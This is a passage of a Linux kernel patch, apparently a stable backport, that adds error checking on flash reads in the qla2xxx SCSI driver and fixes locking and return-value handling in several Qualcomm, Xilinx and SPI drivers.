+@@ -1925,6 +1936,7 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 	if (vha->scan.scan_flags == 0) {
+ 		ql_dbg(ql_dbg_disc, vha, 0xffff, "%s: schedule\n", __func__);
+ 		vha->scan.scan_flags |= SF_QUEUED;
++		vha->scan.rscn_gen_start = atomic_read(&vha->rscn_gen);
+ 		schedule_delayed_work(&vha->scan.scan_work, 5);
+ 	}
+ 	spin_unlock_irqrestore(&vha->work_lock, flags);
+@@ -6419,6 +6431,8 @@ qla2x00_configure_fabric(scsi_qla_host_t *vha)
+ 		qlt_do_generation_tick(vha, &discovery_gen);
+ 
+ 		if (USE_ASYNC_SCAN(ha)) {
++			/* start of scan begins here */
++			vha->scan.rscn_gen_end = atomic_read(&vha->rscn_gen);
+ 			rval = qla24xx_async_gpnft(vha, FC4_TYPE_FCP_SCSI,
+ 			    NULL);
+ 			if (rval)
+@@ -8260,15 +8274,21 @@ qla28xx_get_aux_images(
+ 	struct qla27xx_image_status pri_aux_image_status, sec_aux_image_status;
+ 	bool valid_pri_image = false, valid_sec_image = false;
+ 	bool active_pri_image = false, active_sec_image = false;
++	int rc;
+ 
+ 	if (!ha->flt_region_aux_img_status_pri) {
+ 		ql_dbg(ql_dbg_init, vha, 0x018a, "Primary aux image not addressed\n");
+ 		goto check_sec_image;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, (uint32_t *)&pri_aux_image_status,
++	rc = qla24xx_read_flash_data(vha, (uint32_t *)&pri_aux_image_status,
+ 	    ha->flt_region_aux_img_status_pri,
+ 	    sizeof(pri_aux_image_status) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a1,
++		    "Unable to read Primary aux image(%x).\n", rc);
++		goto check_sec_image;
++	}
+ 	qla27xx_print_image(vha, "Primary aux image", &pri_aux_image_status);
+ 
+ 	if (qla28xx_check_aux_image_status_signature(&pri_aux_image_status)) {
+@@ -8299,9 +8319,15 @@ qla28xx_get_aux_images(
+ 		goto check_valid_image;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, (uint32_t *)&sec_aux_image_status,
++	rc = qla24xx_read_flash_data(vha, (uint32_t *)&sec_aux_image_status,
+ 	    ha->flt_region_aux_img_status_sec,
+ 	    sizeof(sec_aux_image_status) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a2,
++		    "Unable to read Secondary aux image(%x).\n", rc);
++		goto check_valid_image;
++	}
++
+ 	qla27xx_print_image(vha, "Secondary aux image", &sec_aux_image_status);
+ 
+ 	if (qla28xx_check_aux_image_status_signature(&sec_aux_image_status)) {
+@@ -8359,6 +8385,7 @@ qla27xx_get_active_image(struct scsi_qla_host *vha,
+ 	struct qla27xx_image_status pri_image_status, sec_image_status;
+ 	bool valid_pri_image = false, valid_sec_image = false;
+ 	bool active_pri_image = false, active_sec_image = false;
++	int rc;
+ 
+ 	if (!ha->flt_region_img_status_pri) {
+ 		ql_dbg(ql_dbg_init, vha, 0x018a, "Primary image not addressed\n");
+@@ -8400,8 +8427,14 @@ qla27xx_get_active_image(struct scsi_qla_host *vha,
+ 		goto check_valid_image;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, (uint32_t *)(&sec_image_status),
++	rc = qla24xx_read_flash_data(vha, (uint32_t *)(&sec_image_status),
+ 	    ha->flt_region_img_status_sec, sizeof(sec_image_status) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a3,
++		    "Unable to read Secondary image status(%x).\n", rc);
++		goto check_valid_image;
++	}
++
+ 	qla27xx_print_image(vha, "Secondary image", &sec_image_status);
+ 
+ 	if (qla27xx_check_image_status_signature(&sec_image_status)) {
+@@ -8473,11 +8506,10 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 	    "FW: Loading firmware from flash (%x).\n", faddr);
+ 
+ 	dcode = (uint32_t *)req->ring;
+-	qla24xx_read_flash_data(vha, dcode, faddr, 8);
+-	if (qla24xx_risc_firmware_invalid(dcode)) {
++	rval = qla24xx_read_flash_data(vha, dcode, faddr, 8);
++	if (rval || qla24xx_risc_firmware_invalid(dcode)) {
+ 		ql_log(ql_log_fatal, vha, 0x008c,
+-		    "Unable to verify the integrity of flash firmware "
+-		    "image.\n");
++		    "Unable to verify the integrity of flash firmware image (rval %x).\n", rval);
+ 		ql_log(ql_log_fatal, vha, 0x008d,
+ 		    "Firmware data: %08x %08x %08x %08x.\n",
+ 		    dcode[0], dcode[1], dcode[2], dcode[3]);
+@@ -8491,7 +8523,12 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 	for (j = 0; j < segments; j++) {
+ 		ql_dbg(ql_dbg_init, vha, 0x008d,
+ 		    "-> Loading segment %u...\n", j);
+-		qla24xx_read_flash_data(vha, dcode, faddr, 10);
++		rval = qla24xx_read_flash_data(vha, dcode, faddr, 10);
++		if (rval) {
++			ql_log(ql_log_fatal, vha, 0x016a,
++			    "-> Unable to read segment addr + size .\n");
++			return QLA_FUNCTION_FAILED;
++		}
+ 		risc_addr = be32_to_cpu((__force __be32)dcode[2]);
+ 		risc_size = be32_to_cpu((__force __be32)dcode[3]);
+ 		if (!*srisc_addr) {
+@@ -8507,7 +8544,13 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 			ql_dbg(ql_dbg_init, vha, 0x008e,
+ 			    "-> Loading fragment %u: %#x <- %#x (%#lx dwords)...\n",
+ 			    fragment, risc_addr, faddr, dlen);
+-			qla24xx_read_flash_data(vha, dcode, faddr, dlen);
++			rval = qla24xx_read_flash_data(vha, dcode, faddr, dlen);
++			if (rval) {
++				ql_log(ql_log_fatal, vha, 0x016b,
++				    "-> Unable to read fragment(faddr %#x dlen %#lx).\n",
++				    faddr, dlen);
++				return QLA_FUNCTION_FAILED;
++			}
+ 			for (i = 0; i < dlen; i++)
+ 				dcode[i] = swab32(dcode[i]);
+ 
+@@ -8536,7 +8579,14 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 		fwdt->length = 0;
+ 
+ 		dcode = (uint32_t *)req->ring;
+-		qla24xx_read_flash_data(vha, dcode, faddr, 7);
++
++		rval = qla24xx_read_flash_data(vha, dcode, faddr, 7);
++		if (rval) {
++			ql_log(ql_log_fatal, vha, 0x016c,
++			    "-> Unable to read template size.\n");
++			goto failed;
++		}
++
+ 		risc_size = be32_to_cpu((__force __be32)dcode[2]);
+ 		ql_dbg(ql_dbg_init, vha, 0x0161,
+ 		    "-> fwdt%u template array at %#x (%#x dwords)\n",
+@@ -8562,11 +8612,12 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 		}
+ 
+ 		dcode = fwdt->template;
+-		qla24xx_read_flash_data(vha, dcode, faddr, risc_size);
++		rval = qla24xx_read_flash_data(vha, dcode, faddr, risc_size);
+ 
+-		if (!qla27xx_fwdt_template_valid(dcode)) {
++		if (rval || !qla27xx_fwdt_template_valid(dcode)) {
+ 			ql_log(ql_log_warn, vha, 0x0165,
+-			    "-> fwdt%u failed template validate\n", j);
++			    "-> fwdt%u failed template validate (rval %x)\n",
++			    j, rval);
+ 			goto failed;
+ 		}
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index a4a56ab0ba747..ef4b3cc1cd77e 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -631,3 +631,11 @@ static inline int qla_mapq_alloc_qp_cpu_map(struct qla_hw_data *ha)
+ 	}
+ 	return 0;
+ }
++
++static inline bool val_is_in_range(u32 val, u32 start, u32 end)
++{
++	if (val >= start && val <= end)
++		return true;
++	else
++		return false;
++}
+diff --git a/drivers/scsi/qla2xxx/qla_mid.c b/drivers/scsi/qla2xxx/qla_mid.c
+index 16a9f22bb8600..9e8df452ee145 100644
+--- a/drivers/scsi/qla2xxx/qla_mid.c
++++ b/drivers/scsi/qla2xxx/qla_mid.c
+@@ -180,7 +180,7 @@ qla24xx_disable_vp(scsi_qla_host_t *vha)
+ 	atomic_set(&vha->loop_state, LOOP_DOWN);
+ 	atomic_set(&vha->loop_down_timer, LOOP_DOWN_TIME);
+ 	list_for_each_entry(fcport, &vha->vp_fcports, list)
+-		fcport->logout_on_delete = 0;
++		fcport->logout_on_delete = 1;
+ 
+ 	if (!vha->hw->flags.edif_enabled)
+ 		qla2x00_wait_for_sess_deletion(vha);
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 9941b38eac93c..622b11660b67c 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -29,7 +29,10 @@ int qla_nvme_register_remote(struct scsi_qla_host *vha, struct fc_port *fcport)
+ 		return 0;
+ 	}
+ 
+-	if (!vha->nvme_local_port && qla_nvme_register_hba(vha))
++	if (qla_nvme_register_hba(vha))
++		return 0;
++
++	if (!vha->nvme_local_port)
+ 		return 0;
+ 
+ 	if (!(fcport->nvme_prli_service_param &
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 25d0c2bfdd742..41a7ffaabfd1e 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -1869,14 +1869,9 @@ __qla2x00_abort_all_cmds(struct qla_qpair *qp, int res)
+ 	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+ 		sp = req->outstanding_cmds[cnt];
+ 		if (sp) {
+-			/*
+-			 * perform lockless completion during driver unload
+-			 */
+ 			if (qla2x00_chip_is_down(vha)) {
+ 				req->outstanding_cmds[cnt] = NULL;
+-				spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
+ 				sp->done(sp, res);
+-				spin_lock_irqsave(qp->qp_lock_ptr, flags);
+ 				continue;
+ 			}
+ 
+@@ -4667,7 +4662,7 @@ static void
+ qla2x00_number_of_exch(scsi_qla_host_t *vha, u32 *ret_cnt, u16 max_cnt)
+ {
+ 	u32 temp;
+-	struct init_cb_81xx *icb = (struct init_cb_81xx *)&vha->hw->init_cb;
++	struct init_cb_81xx *icb = (struct init_cb_81xx *)vha->hw->init_cb;
+ 	*ret_cnt = FW_DEF_EXCHANGES_CNT;
+ 
+ 	if (max_cnt > vha->hw->max_exchg)
+diff --git a/drivers/scsi/qla2xxx/qla_sup.c b/drivers/scsi/qla2xxx/qla_sup.c
+index c092a6b1ced4f..6d16546e17292 100644
+--- a/drivers/scsi/qla2xxx/qla_sup.c
++++ b/drivers/scsi/qla2xxx/qla_sup.c
+@@ -555,6 +555,7 @@ qla2xxx_find_flt_start(scsi_qla_host_t *vha, uint32_t *start)
+ 	struct qla_flt_location *fltl = (void *)req->ring;
+ 	uint32_t *dcode = (uint32_t *)req->ring;
+ 	uint8_t *buf = (void *)req->ring, *bcode,  last_image;
++	int rc;
+ 
+ 	/*
+ 	 * FLT-location structure resides after the last PCI region.
+@@ -584,14 +585,24 @@ qla2xxx_find_flt_start(scsi_qla_host_t *vha, uint32_t *start)
+ 	pcihdr = 0;
+ 	do {
+ 		/* Verify PCI expansion ROM header. */
+-		qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		rc = qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		if (rc) {
++			ql_log(ql_log_info, vha, 0x016d,
++			    "Unable to read PCI Expansion Rom Header (%x).\n", rc);
++			return QLA_FUNCTION_FAILED;
++		}
+ 		bcode = buf + (pcihdr % 4);
+ 		if (bcode[0x0] != 0x55 || bcode[0x1] != 0xaa)
+ 			goto end;
+ 
+ 		/* Locate PCI data structure. */
+ 		pcids = pcihdr + ((bcode[0x19] << 8) | bcode[0x18]);
+-		qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		rc = qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		if (rc) {
++			ql_log(ql_log_info, vha, 0x0179,
++			    "Unable to read PCI Data Structure (%x).\n", rc);
++			return QLA_FUNCTION_FAILED;
++		}
+ 		bcode = buf + (pcihdr % 4);
+ 
+ 		/* Validate signature of PCI data structure. */
+@@ -606,7 +617,12 @@ qla2xxx_find_flt_start(scsi_qla_host_t *vha, uint32_t *start)
+ 	} while (!last_image);
+ 
+ 	/* Now verify FLT-location structure. */
+-	qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, sizeof(*fltl) >> 2);
++	rc = qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, sizeof(*fltl) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x017a,
++		    "Unable to read FLT (%x).\n", rc);
++		return QLA_FUNCTION_FAILED;
++	}
+ 	if (memcmp(fltl->sig, "QFLT", 4))
+ 		goto end;
+ 
+@@ -2605,13 +2621,18 @@ qla24xx_read_optrom_data(struct scsi_qla_host *vha, void *buf,
+     uint32_t offset, uint32_t length)
+ {
+ 	struct qla_hw_data *ha = vha->hw;
++	int rc;
+ 
+ 	/* Suspend HBA. */
+ 	scsi_block_requests(vha->host);
+ 	set_bit(MBX_UPDATE_FLASH_ACTIVE, &ha->mbx_cmd_flags);
+ 
+ 	/* Go with read. */
+-	qla24xx_read_flash_data(vha, buf, offset >> 2, length >> 2);
++	rc = qla24xx_read_flash_data(vha, buf, offset >> 2, length >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a0,
++		    "Unable to perform optrom read(%x).\n", rc);
++	}
+ 
+ 	/* Resume HBA. */
+ 	clear_bit(MBX_UPDATE_FLASH_ACTIVE, &ha->mbx_cmd_flags);
+@@ -3412,7 +3433,7 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 	struct active_regions active_regions = { };
+ 
+ 	if (IS_P3P_TYPE(ha))
+-		return ret;
++		return QLA_SUCCESS;
+ 
+ 	if (!mbuf)
+ 		return QLA_FUNCTION_FAILED;
+@@ -3432,20 +3453,31 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 
+ 	do {
+ 		/* Verify PCI expansion ROM header. */
+-		qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		ret = qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		if (ret) {
++			ql_log(ql_log_info, vha, 0x017d,
++			    "Unable to read PCI EXP Rom Header(%x).\n", ret);
++			return QLA_FUNCTION_FAILED;
++		}
++
+ 		bcode = mbuf + (pcihdr % 4);
+ 		if (memcmp(bcode, "\x55\xaa", 2)) {
+ 			/* No signature */
+ 			ql_log(ql_log_fatal, vha, 0x0059,
+ 			    "No matching ROM signature.\n");
+-			ret = QLA_FUNCTION_FAILED;
+-			break;
++			return QLA_FUNCTION_FAILED;
+ 		}
+ 
+ 		/* Locate PCI data structure. */
+ 		pcids = pcihdr + ((bcode[0x19] << 8) | bcode[0x18]);
+ 
+-		qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		ret = qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		if (ret) {
++			ql_log(ql_log_info, vha, 0x018e,
++			    "Unable to read PCI Data Structure (%x).\n", ret);
++			return QLA_FUNCTION_FAILED;
++		}
++
+ 		bcode = mbuf + (pcihdr % 4);
+ 
+ 		/* Validate signature of PCI data structure. */
+@@ -3454,8 +3486,7 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 			ql_log(ql_log_fatal, vha, 0x005a,
+ 			    "PCI data struct not found pcir_adr=%x.\n", pcids);
+ 			ql_dump_buffer(ql_dbg_init, vha, 0x0059, dcode, 32);
+-			ret = QLA_FUNCTION_FAILED;
+-			break;
++			return QLA_FUNCTION_FAILED;
+ 		}
+ 
+ 		/* Read version */
+@@ -3507,20 +3538,26 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 			faddr = ha->flt_region_fw_sec;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, dcode, faddr, 8);
+-	if (qla24xx_risc_firmware_invalid(dcode)) {
+-		ql_log(ql_log_warn, vha, 0x005f,
+-		    "Unrecognized fw revision at %x.\n",
+-		    ha->flt_region_fw * 4);
+-		ql_dump_buffer(ql_dbg_init, vha, 0x005f, dcode, 32);
++	ret = qla24xx_read_flash_data(vha, dcode, faddr, 8);
++	if (ret) {
++		ql_log(ql_log_info, vha, 0x019e,
++		    "Unable to read FW version (%x).\n", ret);
++		return ret;
+ 	} else {
+-		for (i = 0; i < 4; i++)
+-			ha->fw_revision[i] =
++		if (qla24xx_risc_firmware_invalid(dcode)) {
++			ql_log(ql_log_warn, vha, 0x005f,
++			    "Unrecognized fw revision at %x.\n",
++			    ha->flt_region_fw * 4);
++			ql_dump_buffer(ql_dbg_init, vha, 0x005f, dcode, 32);
++		} else {
++			for (i = 0; i < 4; i++)
++				ha->fw_revision[i] =
+ 				be32_to_cpu((__force __be32)dcode[4+i]);
+-		ql_dbg(ql_dbg_init, vha, 0x0060,
+-		    "Firmware revision (flash) %u.%u.%u (%x).\n",
+-		    ha->fw_revision[0], ha->fw_revision[1],
+-		    ha->fw_revision[2], ha->fw_revision[3]);
++			ql_dbg(ql_dbg_init, vha, 0x0060,
++			    "Firmware revision (flash) %u.%u.%u (%x).\n",
++			    ha->fw_revision[0], ha->fw_revision[1],
++			    ha->fw_revision[2], ha->fw_revision[3]);
++		}
+ 	}
+ 
+ 	/* Check for golden firmware and get version if available */
+@@ -3531,18 +3568,23 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 
+ 	memset(ha->gold_fw_version, 0, sizeof(ha->gold_fw_version));
+ 	faddr = ha->flt_region_gold_fw;
+-	qla24xx_read_flash_data(vha, dcode, ha->flt_region_gold_fw, 8);
+-	if (qla24xx_risc_firmware_invalid(dcode)) {
+-		ql_log(ql_log_warn, vha, 0x0056,
+-		    "Unrecognized golden fw at %#x.\n", faddr);
+-		ql_dump_buffer(ql_dbg_init, vha, 0x0056, dcode, 32);
++	ret = qla24xx_read_flash_data(vha, dcode, ha->flt_region_gold_fw, 8);
++	if (ret) {
++		ql_log(ql_log_info, vha, 0x019f,
++		    "Unable to read Gold FW version (%x).\n", ret);
+ 		return ret;
+-	}
+-
+-	for (i = 0; i < 4; i++)
+-		ha->gold_fw_version[i] =
+-			be32_to_cpu((__force __be32)dcode[4+i]);
++	} else {
++		if (qla24xx_risc_firmware_invalid(dcode)) {
++			ql_log(ql_log_warn, vha, 0x0056,
++			    "Unrecognized golden fw at %#x.\n", faddr);
++			ql_dump_buffer(ql_dbg_init, vha, 0x0056, dcode, 32);
++			return QLA_FUNCTION_FAILED;
++		}
+ 
++		for (i = 0; i < 4; i++)
++			ha->gold_fw_version[i] =
++			   be32_to_cpu((__force __be32)dcode[4+i]);
++	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/qcom/pdr_interface.c b/drivers/soc/qcom/pdr_interface.c
+index 0034af927b488..c7cd4daa10b0f 100644
+--- a/drivers/soc/qcom/pdr_interface.c
++++ b/drivers/soc/qcom/pdr_interface.c
+@@ -76,12 +76,12 @@ static int pdr_locator_new_server(struct qmi_handle *qmi,
+ 					      locator_hdl);
+ 	struct pdr_service *pds;
+ 
++	mutex_lock(&pdr->lock);
+ 	/* Create a local client port for QMI communication */
+ 	pdr->locator_addr.sq_family = AF_QIPCRTR;
+ 	pdr->locator_addr.sq_node = svc->node;
+ 	pdr->locator_addr.sq_port = svc->port;
+ 
+-	mutex_lock(&pdr->lock);
+ 	pdr->locator_init_complete = true;
+ 	mutex_unlock(&pdr->lock);
+ 
+@@ -104,10 +104,10 @@ static void pdr_locator_del_server(struct qmi_handle *qmi,
+ 
+ 	mutex_lock(&pdr->lock);
+ 	pdr->locator_init_complete = false;
+-	mutex_unlock(&pdr->lock);
+ 
+ 	pdr->locator_addr.sq_node = 0;
+ 	pdr->locator_addr.sq_port = 0;
++	mutex_unlock(&pdr->lock);
+ }
+ 
+ static const struct qmi_ops pdr_locator_ops = {
+@@ -365,12 +365,14 @@ static int pdr_get_domain_list(struct servreg_get_domain_list_req *req,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	mutex_lock(&pdr->lock);
+ 	ret = qmi_send_request(&pdr->locator_hdl,
+ 			       &pdr->locator_addr,
+ 			       &txn, SERVREG_GET_DOMAIN_LIST_REQ,
+ 			       SERVREG_GET_DOMAIN_LIST_REQ_MAX_LEN,
+ 			       servreg_get_domain_list_req_ei,
+ 			       req);
++	mutex_unlock(&pdr->lock);
+ 	if (ret < 0) {
+ 		qmi_txn_cancel(&txn);
+ 		return ret;
+@@ -415,7 +417,7 @@ static int pdr_locate_service(struct pdr_handle *pdr, struct pdr_service *pds)
+ 		if (ret < 0)
+ 			goto out;
+ 
+-		for (i = domains_read; i < resp->domain_list_len; i++) {
++		for (i = 0; i < resp->domain_list_len; i++) {
+ 			entry = &resp->domain_list[i];
+ 
+ 			if (strnlen(entry->name, sizeof(entry->name)) == sizeof(entry->name))
+diff --git a/drivers/soc/qcom/rpmh-rsc.c b/drivers/soc/qcom/rpmh-rsc.c
+index 5e7bb6338707d..ff2b9eb9f669f 100644
+--- a/drivers/soc/qcom/rpmh-rsc.c
++++ b/drivers/soc/qcom/rpmh-rsc.c
+@@ -608,13 +608,14 @@ int rpmh_rsc_send_data(struct rsc_drv *drv, const struct tcs_request *msg)
+ {
+ 	struct tcs_group *tcs;
+ 	int tcs_id;
+-	unsigned long flags;
++
++	might_sleep();
+ 
+ 	tcs = get_tcs_for_msg(drv, msg);
+ 	if (IS_ERR(tcs))
+ 		return PTR_ERR(tcs);
+ 
+-	spin_lock_irqsave(&drv->lock, flags);
++	spin_lock_irq(&drv->lock);
+ 
+ 	/* Wait forever for a free tcs. It better be there eventually! */
+ 	wait_event_lock_irq(drv->tcs_wait,
+@@ -632,7 +633,7 @@ int rpmh_rsc_send_data(struct rsc_drv *drv, const struct tcs_request *msg)
+ 		write_tcs_reg_sync(drv, RSC_DRV_CMD_ENABLE, tcs_id, 0);
+ 		enable_tcs_irq(drv, tcs_id, true);
+ 	}
+-	spin_unlock_irqrestore(&drv->lock, flags);
++	spin_unlock_irq(&drv->lock);
+ 
+ 	/*
+ 	 * These two can be done after the lock is released because:
+diff --git a/drivers/soc/qcom/rpmh.c b/drivers/soc/qcom/rpmh.c
+index 01765ee9cdfb8..c6df7ac0afebc 100644
+--- a/drivers/soc/qcom/rpmh.c
++++ b/drivers/soc/qcom/rpmh.c
+@@ -189,7 +189,6 @@ static int __rpmh_write(const struct device *dev, enum rpmh_state state,
+ 	}
+ 
+ 	if (state == RPMH_ACTIVE_ONLY_STATE) {
+-		WARN_ON(irqs_disabled());
+ 		ret = rpmh_rsc_send_data(ctrlr_to_drv(ctrlr), &rpm_msg->msg);
+ 	} else {
+ 		/* Clean up our call by spoofing tx_done */
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index 8293cc40047fa..82e3174740238 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -3,6 +3,7 @@
+  * Xilinx Event Management Driver
+  *
+  *  Copyright (C) 2021 Xilinx, Inc.
++ *  Copyright (C) 2024 Advanced Micro Devices, Inc.
+  *
+  *  Abhyuday Godhasara <abhyuday.godhasara@xilinx.com>
+  */
+@@ -19,7 +20,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/slab.h>
+ 
+-static DEFINE_PER_CPU_READ_MOSTLY(int, cpu_number1);
++static DEFINE_PER_CPU_READ_MOSTLY(int, dummy_cpu_number);
+ 
+ static int virq_sgi;
+ static int event_manager_availability = -EACCES;
+@@ -555,7 +556,6 @@ static void xlnx_disable_percpu_irq(void *data)
+ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ {
+ 	int ret = 0;
+-	int cpu;
+ 	/*
+ 	 * IRQ related structures are used for the following:
+ 	 * for each SGI interrupt ensure its mapped by GIC IRQ domain
+@@ -592,11 +592,8 @@ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ 	sgi_fwspec.param[0] = sgi_num;
+ 	virq_sgi = irq_create_fwspec_mapping(&sgi_fwspec);
+ 
+-	cpu = get_cpu();
+-	per_cpu(cpu_number1, cpu) = cpu;
+ 	ret = request_percpu_irq(virq_sgi, xlnx_event_handler, "xlnx_event_mgmt",
+-				 &cpu_number1);
+-	put_cpu();
++				 &dummy_cpu_number);
+ 
+ 	WARN_ON(ret);
+ 	if (ret) {
+@@ -612,16 +609,12 @@ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ 
+ static void xlnx_event_cleanup_sgi(struct platform_device *pdev)
+ {
+-	int cpu = smp_processor_id();
+-
+-	per_cpu(cpu_number1, cpu) = cpu;
+-
+ 	cpuhp_remove_state(CPUHP_AP_ONLINE_DYN);
+ 
+ 	on_each_cpu(xlnx_disable_percpu_irq, NULL, 1);
+ 
+ 	irq_clear_status_flags(virq_sgi, IRQ_PER_CPU);
+-	free_percpu_irq(virq_sgi, &cpu_number1);
++	free_percpu_irq(virq_sgi, &dummy_cpu_number);
+ 	irq_dispose_mapping(virq_sgi);
+ }
+ 
+diff --git a/drivers/soc/xilinx/zynqmp_power.c b/drivers/soc/xilinx/zynqmp_power.c
+index 78a8a7545d1ed..5d41763414ad0 100644
+--- a/drivers/soc/xilinx/zynqmp_power.c
++++ b/drivers/soc/xilinx/zynqmp_power.c
+@@ -187,7 +187,9 @@ static int zynqmp_pm_probe(struct platform_device *pdev)
+ 	u32 pm_api_version;
+ 	struct mbox_client *client;
+ 
+-	zynqmp_pm_get_api_version(&pm_api_version);
++	ret = zynqmp_pm_get_api_version(&pm_api_version);
++	if (ret)
++		return ret;
+ 
+ 	/* Check PM API version number */
+ 	if (pm_api_version < ZYNQMP_PM_VERSION)
+diff --git a/drivers/spi/atmel-quadspi.c b/drivers/spi/atmel-quadspi.c
+index 7e05b48dbd71c..1f1aee28b1f79 100644
+--- a/drivers/spi/atmel-quadspi.c
++++ b/drivers/spi/atmel-quadspi.c
+@@ -724,8 +724,15 @@ static int __maybe_unused atmel_qspi_resume(struct device *dev)
+ 	struct atmel_qspi *aq = spi_controller_get_devdata(ctrl);
+ 	int ret;
+ 
+-	clk_prepare(aq->pclk);
+-	clk_prepare(aq->qspick);
++	ret = clk_prepare(aq->pclk);
++	if (ret)
++		return ret;
++
++	ret = clk_prepare(aq->qspick);
++	if (ret) {
++		clk_unprepare(aq->pclk);
++		return ret;
++	}
+ 
+ 	ret = pm_runtime_force_resume(dev);
+ 	if (ret < 0)
+diff --git a/drivers/spi/spi-microchip-core.c b/drivers/spi/spi-microchip-core.c
+index d352844c798c9..bfad0fe743ad7 100644
+--- a/drivers/spi/spi-microchip-core.c
++++ b/drivers/spi/spi-microchip-core.c
+@@ -21,7 +21,7 @@
+ #include <linux/spi/spi.h>
+ 
+ #define MAX_LEN				(0xffff)
+-#define MAX_CS				(8)
++#define MAX_CS				(1)
+ #define DEFAULT_FRAMESIZE		(8)
+ #define FIFO_DEPTH			(32)
+ #define CLK_GEN_MODE1_MAX		(255)
+@@ -75,6 +75,7 @@
+ 
+ #define REG_CONTROL		(0x00)
+ #define REG_FRAME_SIZE		(0x04)
++#define  FRAME_SIZE_MASK	GENMASK(5, 0)
+ #define REG_STATUS		(0x08)
+ #define REG_INT_CLEAR		(0x0c)
+ #define REG_RX_DATA		(0x10)
+@@ -89,6 +90,7 @@
+ #define REG_RIS			(0x24)
+ #define REG_CONTROL2		(0x28)
+ #define REG_COMMAND		(0x2c)
++#define  COMMAND_CLRFRAMECNT	BIT(4)
+ #define REG_PKTSIZE		(0x30)
+ #define REG_CMD_SIZE		(0x34)
+ #define REG_HWSTATUS		(0x38)
+@@ -157,62 +159,59 @@ static inline void mchp_corespi_read_fifo(struct mchp_corespi *spi)
+ 
+ static void mchp_corespi_enable_ints(struct mchp_corespi *spi)
+ {
+-	u32 control, mask = INT_ENABLE_MASK;
+-
+-	mchp_corespi_disable(spi);
+-
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+-
+-	control |= mask;
+-	mchp_corespi_write(spi, REG_CONTROL, control);
++	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+-	control |= CONTROL_ENABLE;
++	control |= INT_ENABLE_MASK;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ }
+ 
+ static void mchp_corespi_disable_ints(struct mchp_corespi *spi)
+ {
+-	u32 control, mask = INT_ENABLE_MASK;
+-
+-	mchp_corespi_disable(spi);
+-
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+-	control &= ~mask;
+-	mchp_corespi_write(spi, REG_CONTROL, control);
++	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+-	control |= CONTROL_ENABLE;
++	control &= ~INT_ENABLE_MASK;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ }
+ 
+ static inline void mchp_corespi_set_xfer_size(struct mchp_corespi *spi, int len)
+ {
+ 	u32 control;
+-	u16 lenpart;
++	u32 lenpart;
++	u32 frames = mchp_corespi_read(spi, REG_FRAMESUP);
+ 
+ 	/*
+-	 * Disable the SPI controller. Writes to transfer length have
+-	 * no effect when the controller is enabled.
++	 * Writing to FRAMECNT in REG_CONTROL will reset the frame count, taking
++	 * a shortcut requires an explicit clear.
+ 	 */
+-	mchp_corespi_disable(spi);
++	if (frames == len) {
++		mchp_corespi_write(spi, REG_COMMAND, COMMAND_CLRFRAMECNT);
++		return;
